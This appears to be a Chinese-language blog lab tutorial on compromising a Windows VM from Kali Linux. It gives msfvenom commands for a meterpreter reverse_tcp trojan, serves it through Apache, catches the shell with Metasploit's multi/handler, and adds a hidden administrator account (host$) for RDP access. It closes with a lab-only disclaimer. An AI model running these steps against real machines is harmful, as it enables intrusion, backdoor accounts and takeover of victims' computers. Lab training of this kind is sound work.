利用kali Linux 渗透windows 操作系统

利用kali Linux 渗透windows 操作系统

一、实验目的:使用kali生成木马,渗透windows系统

二、实验内容:

使用kali中的Metasploit生成木马,控制windows系统

三、实验环境

需要从VMware Workstation 中创建两台虚拟机

一台kali linux和一台靶机windows系统

1、攻击者ip(kali) 192.168.63.21

2、靶机ip(windows)192.168.63.20

四、实验步骤

先将虚拟机的网络模式修改为桥接模式

cf1cfe1c28fb4fd79019b9287308b135.png

c83b41da2e20467c9bc478bfcda3c27c.png

设置靶机ip(windows)

     从右下角网络右键打开网络和共享中心

8fa28ff8d61742f0979098839b2803c4.png

点击本地连接

d808d841e58140eaa0e6da1f5fb6a8a9.png

点击属性

817017cb3b964129b5b003e8e43a39da.png

找到ipv4,双击点开

ccaa5341d678450393ba974b25ebd3c2.png

设置ip地址

0de1d3395f29437daf523da408179f91.png

查看靶机(windows)的ip地址

win+r输入cmd

f09d7e48c0a841fcaa2b73371a7c64aa.png

进入终端后输入ipconfig查看ip

ip地址为192.168.63.20 设置成功

e4897181f35c43f88275856912e6dc9e.png

设置kali的ip

ifconfig eth0 [要修改的IP地址] netmask [子网掩码]

(重启后生效)

f13fef80eb3f4ec79f5f6d2c2567ca01.png

重启后进入终端输入ifconfig查看ip地址

ip地址为192.168.63.21

d0425fbeaecd4f7a9ffe00cb99b6daa6.png

保证两个系统能相互ping通

d7377d248df94d38b2443c7b530bc062.png

d85b5b4659cb496d8d8d1104f4cd6637.png

生成木马,在kali打开终端输入以下命令

msfvenom -p windows/meterpreter/reverse_tcp lhost=攻击者ip lport=监听端口 -f 后门文件类型 >/后门文件保存路径/evilshell.txt

e9fddb2f4fe3469ba7bb7b83dfb5274e.png

进入木马文件存放路径,将木马文件evilshell.exe复制到 /var/www/html, 输入命令:

c050305451194119bfd47feaab7691b8.png

进入目录 /var/www/html,将html目录下的其余文件删除,输入命令:

0a4641ec4e5d43fcbdf917b2feabe6b4.png

开启apache服务,输入命令:

/etc/init.d/apache2 start

d0a8457cd2424d839e031be44cc05a3d.png

可以用以下命令查看服务开启状态:

/etc/init.d/apache2 status 

出现绿色的字代表服务已经开启

6c47000664144ab786de28d20f87bc9c.png

在windows7靶机上打开浏览器输入kali的IP,访问kali并下载木马文件evilshell.exe

d0ea47f7f0d044358606e9ad8f8d7e03.png

将文件下载到桌面

cf738f5fa8db41c58ee9becb8db6575c.png

开启postgresql服务,其端口号为5432,输入命令

/etc/init.d/postgresql start

可以用/etc/init.d/postgresql status查看服务开启状态

8123a74963034f2e8b546920e14949fd.png

查看端口,输入命令

netstat -ntulp

c5a74717807648d3888eeb5f10fc4f57.png

开启msfconsole,输入命令

msfconsole

2d59200780eb4b9eb61e886f24d41248.png

设置攻击模块并运行,输入命令:

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set LHOST 攻击者IP

set LPORT 监听端口

show options

run

abdd678d12f942a9a9bb32e2bcdce2fa.png

59434f80d2c54868b136adf4f2600f0f.png

在靶机中双击运行木马文件(evilshell.exe)

a1e26926864443cc98cd8e4fcbcb59a3.png

获取目标主机shell,输入命令

shell

14a027c22d224e0a93a79512a2861153.png

出现乱码现象,输入命令:

chcp 437

225660fbfcb04720866b0cb2245a8cbf.png

输入ipconfig查看靶机的ip地址

701780f9d6c444379e4fcc884ddfdef5.png

在靶机中添加一个隐藏用户(后面加$),并提升隐藏用户的权限,输入以下命令

net user host$ /add

net user

net user host$ 密码

net localgroup administrators host$ /add

net user host$

8f6a1c512f2b4f43b6c4ffa6aa4955da.png

c36b9e22e5c64e868347b259be4019ae.png

kali打开一个新的终端,使用远程桌面连接靶机(靶机需要开启远程连接服务),输入命令

rdesktop 靶机ip

4386f955986d40709ec01b71615bb176.png

使用 host$密码 登录靶机,登录成功后,使用管理员权限打开cmd.添加一个新用户,添加成功则证明渗透成功!

0da06fcd36144b01bde54776eeb42f32.png

添加用户:

添加用户成功,表示渗透成功!

94fa9ce995ac44ad86a3b55a1d3359f4.png

用靶机端切换用户

可以查看到这里出现一个被攻击者添加的一个用户

546f684c20324cb88af2cf4558241f65.png

实验结果:我们在攻击靶机的时候获取到的权限仅仅为获取靶机的IP地址,对其IP进行渗透,靶机端访问了我们做好的木马文件,结果就被入侵了。

注:(此教程仅用于测试 切勿拿他人电脑恶意测试)

!!!不要将IP提供给他人,不要下载并运行陌生的软件,如果是木马文件,可能会被黑客攻击

posted @ 2023-03-05 21:49  YJlio  阅读(942)  评论(0编辑  收藏  举报  来源